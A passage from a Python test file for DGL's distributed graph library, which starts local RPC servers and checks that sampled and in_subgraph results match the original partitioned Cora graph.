partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=True)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_sampling'))
p.start()
time.sleep(1)
pserver_list.append(p)
time.sleep(3)
sampled_graph = start_sample_client(0, tmpdir, num_server > 1)
print("Done sampling")
for p in pserver_list:
p.join()
orig_nid = F.zeros((g.number_of_nodes(),), dtype=F.int64)
orig_eid = F.zeros((g.number_of_edges(),), dtype=F.int64)
for i in range(num_server):
part, _, _, _ = load_partition(tmpdir / 'test_sampling.json', i)
orig_nid[part.ndata[dgl.NID]] = part.ndata['orig_id']
orig_eid[part.edata[dgl.EID]] = part.edata['orig_id']
src, dst = sampled_graph.edges()
src = orig_nid[src]
dst = orig_nid[dst]
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
eids1 = orig_eid[sampled_graph.edata[dgl.EID]]
assert np.array_equal(F.asnumpy(eids1), F.asnumpy(eids))
# Wait non shared memory graph store
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_sampling_shuffle():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
import dgl
gpb = None
if disable_shared_mem:
_, _, _, gpb = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.shutdown_servers()
dgl.distributed.finalize_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
g = dgl.as_heterograph(g)
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
|